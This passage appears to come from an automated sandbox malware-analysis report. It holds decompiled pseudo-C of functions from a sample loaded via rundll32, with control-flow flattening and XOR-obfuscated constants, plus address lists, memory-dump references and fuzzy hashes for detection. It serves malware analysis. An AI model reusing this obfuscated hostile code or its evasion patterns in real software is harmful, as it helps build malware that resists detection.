										} else {
											goto L18;
										}
									} else {
										_v48 = _v48 + _t204;
										_t230 = _t230 - _t204;
										if(_t230 != 0) {
											L10:
											_t184 = _v48;
											L11:
											_t198 = _v24;
											_t228 = 0xb95f952;
											continue;
										} else {
											_t205 = _t226 + _t226;
											_push(_t205);
											_push(_t205);
											_v12 = _t205;
											_t193 = E002D7FF2(_t205);
											_v48 = _t193;
											if(_t193 == 0) {
												goto L17;
											} else {
												E002DED7E(_v88, _t193, _v56, _t197, _t226);
												E002E8519(_v36, _v84, _t197);
												_t197 = _v48;
												_t230 = _t226;
												_t231 =  &(_t231[4]);
												_t196 = _t197 + _t226;
												_t226 = _v12;
												_v48 = _t196;
												if(_t230 == 0) {
													goto L17;
												} else {
													goto L10;
												}
											}
										}
									}
								}
							} else {
								if(_t228 != 0xe611c04) {
									goto L15;
								} else {
									_t228 = 0x5161e0c;
									continue;
								}
							}
							L20:
							return _t229;
						}
						_t226 = 0x10000;
						_push(_t198);
						_push(_t198);
						_t184 = E002D7FF2(0x10000);
						_t197 = _t184;
						if(_t197 == 0) {
							_t198 = _v24;
							_t228 = 0xa3056fc;
							goto L15;
						} else {
							_v48 = _t184;
							_t230 = 0x10000;
							goto L11;
						}
						goto L20;
						L15:
						_t184 = _v48;
					} while (_t228 != 0xa3056fc);
					_t229 = _v20;
					goto L17;
				}
			}










































                                                                                                                                  0x002ea2e8
                                                                                                                                  0x002ea2e8
                                                                                                                                  0x002ea2ef
                                                                                                                                  0x002ea2f3
                                                                                                                                  0x002ea2f7
                                                                                                                                  0x002ea2ff
                                                                                                                                  0x002ea304
                                                                                                                                  0x002ea30c
                                                                                                                                  0x002ea314
                                                                                                                                  0x002ea31c
                                                                                                                                  0x002ea321
                                                                                                                                  0x002ea329
                                                                                                                                  0x002ea331
                                                                                                                                  0x002ea339
                                                                                                                                  0x002ea342
                                                                                                                                  0x002ea34b
                                                                                                                                  0x002ea350
                                                                                                                                  0x002ea355
                                                                                                                                  0x002ea35b
                                                                                                                                  0x002ea363
                                                                                                                                  0x002ea36b
                                                                                                                                  0x002ea373
                                                                                                                                  0x002ea378
                                                                                                                                  0x002ea37d
                                                                                                                                  0x002ea385
                                                                                                                                  0x002ea38d
                                                                                                                                  0x002ea395
                                                                                                                                  0x002ea39d
                                                                                                                                  0x002ea3a5
                                                                                                                                  0x002ea3b1
                                                                                                                                  0x002ea3b6
                                                                                                                                  0x002ea3bc
                                                                                                                                  0x002ea3c4
                                                                                                                                  0x002ea3cc
                                                                                                                                  0x002ea3d8
                                                                                                                                  0x002ea3db
                                                                                                                                  0x002ea3df
                                                                                                                                  0x002ea3e7
                                                                                                                                  0x002ea3f4
                                                                                                                                  0x002ea3f8
                                                                                                                                  0x002ea400
                                                                                                                                  0x002ea408
                                                                                                                                  0x002ea410
                                                                                                                                  0x002ea418
                                                                                                                                  0x002ea420
                                                                                                                                  0x002ea428
                                                                                                                                  0x002ea430
                                                                                                                                  0x002ea438
                                                                                                                                  0x002ea440
                                                                                                                                  0x002ea448
                                                                                                                                  0x002ea450
                                                                                                                                  0x002ea45d
                                                                                                                                  0x002ea461
                                                                                                                                  0x002ea469
                                                                                                                                  0x002ea471
                                                                                                                                  0x002ea479
                                                                                                                                  0x002ea481
                                                                                                                                  0x002ea486
                                                                                                                                  0x002ea48e
                                                                                                                                  0x002ea49b
                                                                                                                                  0x002ea49f
                                                                                                                                  0x002ea4a7
                                                                                                                                  0x002ea4af
                                                                                                                                  0x002ea4b7
                                                                                                                                  0x002ea4bf
                                                                                                                                  0x002ea4c7
                                                                                                                                  0x002ea4cf
                                                                                                                                  0x002ea4d3
                                                                                                                                  0x002ea4d7
                                                                                                                                  0x002ea4df
                                                                                                                                  0x002ea4e7
                                                                                                                                  0x002ea4ef
                                                                                                                                  0x002ea4f4
                                                                                                                                  0x002ea4f9
                                                                                                                                  0x002ea501
                                                                                                                                  0x002ea509
                                                                                                                                  0x002ea511
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea519
                                                                                                                                  0x002ea519
                                                                                                                                  0x002ea519
                                                                                                                                  0x002ea52b
                                                                                                                                  0x002ea559
                                                                                                                                  0x002ea55b
                                                                                                                                  0x002ea55e
                                                                                                                                  0x002ea564
                                                                                                                                  0x002ea63c
                                                                                                                                  0x002ea645
                                                                                                                                  0x002ea56a
                                                                                                                                  0x002ea56a
                                                                                                                                  0x002ea570
                                                                                                                                  0x002ea638
                                                                                                                                  0x002ea63a
                                                                                                                                  0x002ea651
                                                                                                                                  0x002ea657
                                                                                                                                  0x002ea659
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea576
                                                                                                                                  0x002ea576
                                                                                                                                  0x002ea57a
                                                                                                                                  0x002ea57c
                                                                                                                                  0x002ea5df
                                                                                                                                  0x002ea5df
                                                                                                                                  0x002ea5e3
                                                                                                                                  0x002ea5e3
                                                                                                                                  0x002ea5e7
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea57e
                                                                                                                                  0x002ea582
                                                                                                                                  0x002ea58f
                                                                                                                                  0x002ea590
                                                                                                                                  0x002ea591
                                                                                                                                  0x002ea595
                                                                                                                                  0x002ea59a
                                                                                                                                  0x002ea5a2
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea5a8
                                                                                                                                  0x002ea5b4
                                                                                                                                  0x002ea5c2
                                                                                                                                  0x002ea5c7
                                                                                                                                  0x002ea5cb
                                                                                                                                  0x002ea5cd
                                                                                                                                  0x002ea5d0
                                                                                                                                  0x002ea5d3
                                                                                                                                  0x002ea5d7
                                                                                                                                  0x002ea5dd
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea5dd
                                                                                                                                  0x002ea5a2
                                                                                                                                  0x002ea57c
                                                                                                                                  0x002ea570
                                                                                                                                  0x002ea52d
                                                                                                                                  0x002ea533
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea539
                                                                                                                                  0x002ea539
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea539
                                                                                                                                  0x002ea533
                                                                                                                                  0x002ea65d
                                                                                                                                  0x002ea665
                                                                                                                                  0x002ea665
                                                                                                                                  0x002ea5f5
                                                                                                                                  0x002ea604
                                                                                                                                  0x002ea605
                                                                                                                                  0x002ea606
                                                                                                                                  0x002ea60b
                                                                                                                                  0x002ea611
                                                                                                                                  0x002ea61b
                                                                                                                                  0x002ea61f
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea613
                                                                                                                                  0x002ea613
                                                                                                                                  0x002ea617
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea617
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea624
                                                                                                                                  0x002ea624
                                                                                                                                  0x002ea628
                                                                                                                                  0x002ea634
                                                                                                                                  0x00000000
                                                                                                                                  0x002ea634

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !J$YIa$mU$s
                                                                                                                                  • API String ID: 0-3335770892
                                                                                                                                  • Opcode ID: a2c96b5523714fc353019ef791256b388c8b4530006014acc88a687be62f7107
                                                                                                                                  • Instruction ID: 9e27cfb7f098f49b07fcf8150a113337535ef4f4b80bfc8384cc08fef83f2257
                                                                                                                                  • Opcode Fuzzy Hash: a2c96b5523714fc353019ef791256b388c8b4530006014acc88a687be62f7107
                                                                                                                                  • Instruction Fuzzy Hash: 68913F719193819FC354CF2AC18580BFBF1BBD5758F908A1EF99597260D3B4DA188B83
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002E0001 Relevance: 5.2, Strings: 4, Instructions: 191COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                  			E002E0001(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v128;
				signed int _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				char _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				void* _t154;
				void* _t174;
				char _t178;
				void* _t183;
				char* _t189;
				void* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int* _t220;

				_push(_a4);
				_t209 = __edx;
				_push(__edx);
				_push(__ecx);
				E002E20B9(_t154);
				_v132 = _v132 & 0x00000000;
				_t220 =  &(( &_v204)[3]);
				_v140 = 0x6f537b;
				_v136 = 0x2895cf;
				_t183 = 0xf669bfa;
				_v164 = 0xc3509d;
				_v164 = _v164 >> 0xf;
				_v164 = _v164 ^ 0x0007728b;
				_v188 = 0x58efa0;
				_v188 = _v188 + 0xffff9444;
				_t210 = 0x2f;
				_v188 = _v188 / _t210;
				_v188 = _v188 ^ 0x000ac4b2;
				_v176 = 0xa783cc;
				_v176 = _v176 << 0xa;
				_v176 = _v176 ^ 0x73295065;
				_v176 = _v176 ^ 0xed239367;
				_v148 = 0x42262a;
				_v148 = _v148 | 0x228e56d6;
				_v148 = _v148 ^ 0x22cd87d0;
				_v204 = 0xc47428;
				_v204 = _v204 + 0xffff2e33;
				_v204 = _v204 + 0xffff2fa2;
				_v204 = _v204 + 0xffff28a7;
				_v204 = _v204 ^ 0x00c63754;
				_v156 = 0x11bd56;
				_t211 = 0x5c;
				_v156 = _v156 * 0x6a;
				_v156 = _v156 ^ 0x0752342f;
				_v172 = 0x489beb;
				_v172 = _v172 + 0xfe21;
				_v172 = _v172 / _t211;
				_v172 = _v172 ^ 0x0000a4d4;
				_v192 = 0x2e5859;
				_v192 = _v192 ^ 0x83ba67d9;
				_t212 = 0x44;
				_v192 = _v192 / _t212;
				_v192 = _v192 ^ 0x01e00d99;
				_v180 = 0x89bc6d;
				_v180 = _v180 | 0xb1d25d45;
				_v180 = _v180 << 0xe;
				_v180 = _v180 ^ 0xff5cc309;
				_v168 = 0x19805c;
				_t213 = 0x18;
				_v168 = _v168 * 0x16;
				_v168 = _v168 ^ 0x4d2845a5;
				_v168 = _v168 ^ 0x4f1adce1;
				_v196 = 0x9cfdcd;
				_v196 = _v196 / _t213;
				_v196 = _v196 + 0xd8a6;
				_v196 = _v196 ^ 0x0005e56c;
				_v200 = 0x1d77da;
				_t214 = 0x6b;
				_v200 = _v200 / _t214;
				_t215 = 9;
				_v200 = _v200 / _t215;
				_t216 = 0x59;
				_v200 = _v200 / _t216;
				_v200 = _v200 ^ 0x00052bad;
				_v184 = 0x474669;
				_v184 = _v184 * 0x25;
				_v184 = _v184 + 0xffff8141;
				_v184 = _v184 ^ 0x0a4cf000;
				_v160 = 0x98ddfb;
				_v160 = _v160 << 3;
				_v160 = _v160 ^ 0x04cf55b1;
				_v152 = 0xbbc225;
				_v152 = _v152 * 0x58;
				_v152 = _v152 ^ 0x408ec409;
				while(_t183 != 0x4a2a3c4) {
					if(_t183 == 0x640e5f9) {
						__eflags = _v128;
						_t189 =  &_v128;
						while(__eflags != 0) {
							_t178 =  *_t189;
							__eflags = _t178 - 0x30;
							if(_t178 < 0x30) {
								L10:
								__eflags = _t178 - 0x61;
								if(_t178 < 0x61) {
									L12:
									__eflags = _t178 - 0x41;
									if(_t178 < 0x41) {
										L14:
										 *_t189 = 0x58;
									} else {
										__eflags = _t178 - 0x5a;
										if(_t178 > 0x5a) {
											goto L14;
										}
									}
								} else {
									__eflags = _t178 - 0x7a;
									if(_t178 > 0x7a) {
										goto L12;
									}
								}
							} else {
								__eflags = _t178 - 0x39;
								if(_t178 > 0x39) {
									goto L10;
								}
							}
							_t189 = _t189 + 1;
							__eflags =  *_t189;
						}
						_t183 = 0x4a2a3c4;
						continue;
					} else {
						if(_t183 == 0x7562914) {
							_v144 = 0x80;
							_t178 = E002DCD29(_v164,  &_v144, _v176,  &_v128);
							_t220 =  &(_t220[3]);
							_t183 = 0x640e5f9;
							continue;
						} else {
							if(_t183 == 0xf669bfa) {
								_t183 = 0x7562914;
								continue;
							}
						}
					}
					L18:
					__eflags = _t183 - 0x1718ff4;
					if(__eflags != 0) {
						continue;
					}
					return _t178;
				}
				_push(_v172);
				_push(_v156);
				_push(_v204);
				_t174 = E002E8606(_v148, 0x2d1690, __eflags);
				E002D2206( &_v128, _t209, _v196, _v200, _t174, E002DEE81(__eflags), _v184);
				_t178 = E002DA8B0(_v160, _t174, _v152);
				_t220 =  &(_t220[0xb]);
				_t183 = 0x1718ff4;
				goto L18;
			}





































                                                                                                                                  0x002e000b
                                                                                                                                  0x002e0012
                                                                                                                                  0x002e0014
                                                                                                                                  0x002e0015
                                                                                                                                  0x002e0016
                                                                                                                                  0x002e001b
                                                                                                                                  0x002e0020
                                                                                                                                  0x002e0023
                                                                                                                                  0x002e002d
                                                                                                                                  0x002e0035
                                                                                                                                  0x002e003a
                                                                                                                                  0x002e0042
                                                                                                                                  0x002e0047
                                                                                                                                  0x002e004f
                                                                                                                                  0x002e0057
                                                                                                                                  0x002e0065
                                                                                                                                  0x002e006a
                                                                                                                                  0x002e0070
                                                                                                                                  0x002e0078
                                                                                                                                  0x002e0080
                                                                                                                                  0x002e0085
                                                                                                                                  0x002e008d
                                                                                                                                  0x002e0095
                                                                                                                                  0x002e009d
                                                                                                                                  0x002e00a5
                                                                                                                                  0x002e00ad
                                                                                                                                  0x002e00b5
                                                                                                                                  0x002e00bd
                                                                                                                                  0x002e00c5
                                                                                                                                  0x002e00cd
                                                                                                                                  0x002e00d5
                                                                                                                                  0x002e00e2
                                                                                                                                  0x002e00e5
                                                                                                                                  0x002e00e9
                                                                                                                                  0x002e00f1
                                                                                                                                  0x002e00f9
                                                                                                                                  0x002e0109
                                                                                                                                  0x002e010d
                                                                                                                                  0x002e0115
                                                                                                                                  0x002e011d
                                                                                                                                  0x002e0129
                                                                                                                                  0x002e012e
                                                                                                                                  0x002e0134
                                                                                                                                  0x002e013c
                                                                                                                                  0x002e0144
                                                                                                                                  0x002e014c
                                                                                                                                  0x002e0151
                                                                                                                                  0x002e0159
                                                                                                                                  0x002e0166
                                                                                                                                  0x002e0167
                                                                                                                                  0x002e016b
                                                                                                                                  0x002e0173
                                                                                                                                  0x002e017b
                                                                                                                                  0x002e0189
                                                                                                                                  0x002e018d
                                                                                                                                  0x002e0195
                                                                                                                                  0x002e019f
                                                                                                                                  0x002e01ad
                                                                                                                                  0x002e01b2
                                                                                                                                  0x002e01c1
                                                                                                                                  0x002e01c6
                                                                                                                                  0x002e01d5
                                                                                                                                  0x002e01d8
                                                                                                                                  0x002e01dc
                                                                                                                                  0x002e01e4
                                                                                                                                  0x002e01f1
                                                                                                                                  0x002e01f5
                                                                                                                                  0x002e01fd
                                                                                                                                  0x002e0205
                                                                                                                                  0x002e020d
                                                                                                                                  0x002e0212
                                                                                                                                  0x002e021a
                                                                                                                                  0x002e0227
                                                                                                                                  0x002e022b
                                                                                                                                  0x002e0233
                                                                                                                                  0x002e023d
                                                                                                                                  0x002e0280
                                                                                                                                  0x002e0285
                                                                                                                                  0x002e0289
                                                                                                                                  0x002e028b
                                                                                                                                  0x002e028d
                                                                                                                                  0x002e028f
                                                                                                                                  0x002e0295
                                                                                                                                  0x002e0295
                                                                                                                                  0x002e0297
                                                                                                                                  0x002e029d
                                                                                                                                  0x002e029d
                                                                                                                                  0x002e029f
                                                                                                                                  0x002e02a5
                                                                                                                                  0x002e02a5
                                                                                                                                  0x002e02a1
                                                                                                                                  0x002e02a1
                                                                                                                                  0x002e02a3
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e02a3
                                                                                                                                  0x002e0299
                                                                                                                                  0x002e0299
                                                                                                                                  0x002e029b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e029b
                                                                                                                                  0x002e0291
                                                                                                                                  0x002e0291
                                                                                                                                  0x002e0293
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e0293
                                                                                                                                  0x002e02a8
                                                                                                                                  0x002e02a9
                                                                                                                                  0x002e02a9
                                                                                                                                  0x002e02ae
                                                                                                                                  0x00000000
                                                                                                                                  0x002e023f
                                                                                                                                  0x002e0241
                                                                                                                                  0x002e0257
                                                                                                                                  0x002e0271
                                                                                                                                  0x002e0276
                                                                                                                                  0x002e0279
                                                                                                                                  0x00000000
                                                                                                                                  0x002e0243
                                                                                                                                  0x002e0249
                                                                                                                                  0x002e024f
                                                                                                                                  0x00000000
                                                                                                                                  0x002e024f
                                                                                                                                  0x002e0249
                                                                                                                                  0x002e0241
                                                                                                                                  0x002e030f
                                                                                                                                  0x002e030f
                                                                                                                                  0x002e0315
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e0325
                                                                                                                                  0x002e0325
                                                                                                                                  0x002e02b2
                                                                                                                                  0x002e02bb
                                                                                                                                  0x002e02bf
                                                                                                                                  0x002e02c7
                                                                                                                                  0x002e02f3
                                                                                                                                  0x002e0302
                                                                                                                                  0x002e0307
                                                                                                                                  0x002e030a
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: *&B$eP)s$iFG${So
                                                                                                                                  • API String ID: 0-2946410069
                                                                                                                                  • Opcode ID: f3cabd2863ca70439f8a80faa1f6488681b1ae0f19c224d01351e85e45873f8e
                                                                                                                                  • Instruction ID: 33fab4652050435248e18d6d3bf9ebce28584b775e31a080f7363d2afaa4f1a5
                                                                                                                                  • Opcode Fuzzy Hash: f3cabd2863ca70439f8a80faa1f6488681b1ae0f19c224d01351e85e45873f8e
                                                                                                                                  • Instruction Fuzzy Hash: A281B7715193819BD368CF26D588A1BBBF2BBC5B18F40991DF5C586260D3B8C98ACF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002D4EE3 Relevance: 5.2, Strings: 4, Instructions: 168COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E002D4EE3(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				char _v608;
				void* _t203;
				void* _t204;
				void* _t207;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				intOrPtr _t216;
				void* _t221;

				_v84 = _v84 & 0x00000000;
				_v88 = 0xf9097a;
				_v32 = 0xbcbe1d;
				_v32 = _v32 << 9;
				_v32 = _v32 << 9;
				_v32 = _v32 << 0xb;
				_v32 = _v32 ^ 0xa0062323;
				_v16 = 0x782140;
				_v16 = _v16 + 0xfffffe34;
				_v16 = _v16 + 0xfffffe18;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0xe0701d9a;
				_v40 = 0x7af846;
				_v40 = _v40 + 0xffff28b3;
				_v40 = _v40 << 0xd;
				_v40 = _v40 + 0xffffd351;
				_v40 = _v40 ^ 0x441384bc;
				_v68 = 0xebfd4;
				_v68 = _v68 + 0xffff2b98;
				_t212 = 0x4b;
				_v68 = _v68 / _t212;
				_v68 = _v68 ^ 0x000f3184;
				_v48 = 0x77c678;
				_t213 = 0x72;
				_v48 = _v48 * 0x4d;
				_v48 = _v48 + 0x6b8c;
				_v48 = _v48 ^ 0x240efbe4;
				_v24 = 0xae1064;
				_v24 = _v24 / _t213;
				_v24 = _v24 << 7;
				_v24 = _v24 ^ 0x1be7fa9d;
				_v24 = _v24 ^ 0x1b226397;
				_v72 = 0x44bde7;
				_v72 = _v72 | 0x5f63ee23;
				_v72 = _v72 ^ 0x5f6de837;
				_v56 = 0x5a94a4;
				_v56 = _v56 >> 9;
				_t214 = 0xc;
				_v56 = _v56 * 0x2a;
				_v56 = _v56 ^ 0x0003dc1b;
				_v8 = 0x2a4d30;
				_v8 = _v8 + 0xff2b;
				_v8 = _v8 | 0x9a82811b;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0xbcdbc31f;
				_v64 = 0xa41a91;
				_v64 = _v64 | 0x62aa1889;
				_v64 = _v64 << 0xd;
				_v64 = _v64 ^ 0xc357e7aa;
				_v36 = 0x90fe9;
				_v36 = _v36 >> 0xa;
				_v36 = _v36 | 0x57d87c49;
				_v36 = _v36 / _t214;
				_v36 = _v36 ^ 0x0755636a;
				_v28 = 0x5fda7e;
				_v28 = _v28 + 0xffff2d0f;
				_v28 = _v28 << 0xa;
				_v28 = _v28 + 0xdffb;
				_v28 = _v28 ^ 0x7c1a8a5e;
				_v20 = 0xaf632f;
				_v20 = _v20 >> 8;
				_v20 = _v20 << 9;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 ^ 0x0003fa93;
				_v12 = 0x960758;
				_v12 = _v12 ^ 0x64ee01f0;
				_v12 = _v12 | 0x3d3dd2ba;
				_v12 = _v12 << 7;
				_v12 = _v12 ^ 0xbeed48c5;
				_v80 = 0xba0fdf;
				_v80 = _v80 + 0xfd2d;
				_v80 = _v80 ^ 0x00b93168;
				_v60 = 0x5f834c;
				_v60 = _v60 ^ 0x963b7b6a;
				_t215 = 0x3f;
				_v60 = _v60 * 0x3e;
				_v60 = _v60 ^ 0x6c73d449;
				_v76 = 0x4b89c6;
				_v76 = _v76 >> 6;
				_v76 = _v76 ^ 0x0008f57a;
				_v52 = 0x3d488e;
				_v52 = _v52 << 6;
				_v52 = _v52 << 8;
				_v52 = _v52 ^ 0x5226582a;
				_v44 = 0x8cf369;
				_v44 = _v44 ^ 0x25329c0c;
				_v44 = _v44 / _t215;
				_v44 = _v44 >> 0xe;
				_v44 = _v44 ^ 0x0005c7da;
				_t216 =  *0x2f3e10; // 0x0
				_t203 = E002DB6CF(_t216 + 0x1c, _v32, _v16, _v40);
				_t241 = _a4 + 0x2c;
				_t204 = E002DB23C(_v68, _v48, _a4 + 0x2c, _v24, _v72, _t203);
				_t248 = _t204;
				if(_t204 != 0) {
					_push(_v64);
					_push(_v8);
					_t207 = E002EDCF7(_v56, 0x2d1000, _t248);
					_pop(_t221);
					E002D47CE( *((intOrPtr*)(_a8 + 0x18)), _v36, _t221, _v28, _v20, _t207, _t241, _v12, _v80);
					E002DA8B0(_v60, _t207, _v76);
					E002E1F8A(_v52, _v44,  &_v608);
				}
				return 1;
			}


































                                                                                                                                  0x002d4eec
                                                                                                                                  0x002d4ef2
                                                                                                                                  0x002d4ef9
                                                                                                                                  0x002d4f00
                                                                                                                                  0x002d4f04
                                                                                                                                  0x002d4f08
                                                                                                                                  0x002d4f0c
                                                                                                                                  0x002d4f13
                                                                                                                                  0x002d4f1a
                                                                                                                                  0x002d4f21
                                                                                                                                  0x002d4f28
                                                                                                                                  0x002d4f2c
                                                                                                                                  0x002d4f33
                                                                                                                                  0x002d4f3a
                                                                                                                                  0x002d4f41
                                                                                                                                  0x002d4f45
                                                                                                                                  0x002d4f4c
                                                                                                                                  0x002d4f53
                                                                                                                                  0x002d4f5a
                                                                                                                                  0x002d4f67
                                                                                                                                  0x002d4f6c
                                                                                                                                  0x002d4f71
                                                                                                                                  0x002d4f78
                                                                                                                                  0x002d4f83
                                                                                                                                  0x002d4f86
                                                                                                                                  0x002d4f89
                                                                                                                                  0x002d4f90
                                                                                                                                  0x002d4f97
                                                                                                                                  0x002d4fa5
                                                                                                                                  0x002d4fa8
                                                                                                                                  0x002d4fac
                                                                                                                                  0x002d4fb3
                                                                                                                                  0x002d4fba
                                                                                                                                  0x002d4fc1
                                                                                                                                  0x002d4fc8
                                                                                                                                  0x002d4fcf
                                                                                                                                  0x002d4fd6
                                                                                                                                  0x002d4fde
                                                                                                                                  0x002d4fdf
                                                                                                                                  0x002d4fe2
                                                                                                                                  0x002d4fe9
                                                                                                                                  0x002d4ff0
                                                                                                                                  0x002d4ff7
                                                                                                                                  0x002d4ffe
                                                                                                                                  0x002d5002
                                                                                                                                  0x002d5009
                                                                                                                                  0x002d5010
                                                                                                                                  0x002d5017
                                                                                                                                  0x002d501b
                                                                                                                                  0x002d5022
                                                                                                                                  0x002d5029
                                                                                                                                  0x002d502d
                                                                                                                                  0x002d5039
                                                                                                                                  0x002d503c
                                                                                                                                  0x002d5043
                                                                                                                                  0x002d504a
                                                                                                                                  0x002d5051
                                                                                                                                  0x002d5055
                                                                                                                                  0x002d505c
                                                                                                                                  0x002d5063
                                                                                                                                  0x002d506a
                                                                                                                                  0x002d506e
                                                                                                                                  0x002d5072
                                                                                                                                  0x002d5076
                                                                                                                                  0x002d507d
                                                                                                                                  0x002d5084
                                                                                                                                  0x002d508b
                                                                                                                                  0x002d5094
                                                                                                                                  0x002d5098
                                                                                                                                  0x002d509f
                                                                                                                                  0x002d50a6
                                                                                                                                  0x002d50ad
                                                                                                                                  0x002d50b4
                                                                                                                                  0x002d50bb
                                                                                                                                  0x002d50c8
                                                                                                                                  0x002d50c9
                                                                                                                                  0x002d50cc
                                                                                                                                  0x002d50d3
                                                                                                                                  0x002d50da
                                                                                                                                  0x002d50de
                                                                                                                                  0x002d50e5
                                                                                                                                  0x002d50ec
                                                                                                                                  0x002d50f0
                                                                                                                                  0x002d50f4
                                                                                                                                  0x002d50fb
                                                                                                                                  0x002d5102
                                                                                                                                  0x002d510e
                                                                                                                                  0x002d5111
                                                                                                                                  0x002d5115
                                                                                                                                  0x002d5122
                                                                                                                                  0x002d512e
                                                                                                                                  0x002d513a
                                                                                                                                  0x002d5147
                                                                                                                                  0x002d514f
                                                                                                                                  0x002d5151
                                                                                                                                  0x002d5154
                                                                                                                                  0x002d515c
                                                                                                                                  0x002d5162
                                                                                                                                  0x002d516d
                                                                                                                                  0x002d5189
                                                                                                                                  0x002d5196
                                                                                                                                  0x002d51a8
                                                                                                                                  0x002d51b0
                                                                                                                                  0x002d51b8

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcmpi
                                                                                                                                  • String ID: *X&R$0M*$7m_$@!x
                                                                                                                                  • API String ID: 1586166983-4050865940
                                                                                                                                  • Opcode ID: 6e887f9f26dc3f8987acc30aab4f1432d4b6396efcdceca97941f9fc4a5925dc
                                                                                                                                  • Instruction ID: a228040eb7966d8201293cf8ec91d5d1fffac1677edeb6202818fd94209e8b1c
                                                                                                                                  • Opcode Fuzzy Hash: 6e887f9f26dc3f8987acc30aab4f1432d4b6396efcdceca97941f9fc4a5925dc
                                                                                                                                  • Instruction Fuzzy Hash: 1E810272C0121DEBCF49DFA1D88A8EEBBB1FF44718F208119E411B6260D7B55A5ACF94
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002DEA99 Relevance: 5.2, Strings: 4, Instructions: 153COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                  			E002DEA99(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _t136;
				signed int _t147;
				void* _t150;
				intOrPtr* _t152;
				void* _t154;
				void* _t165;
				signed int _t166;
				signed int _t167;
				signed int* _t171;

				_push(_a16);
				_t152 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
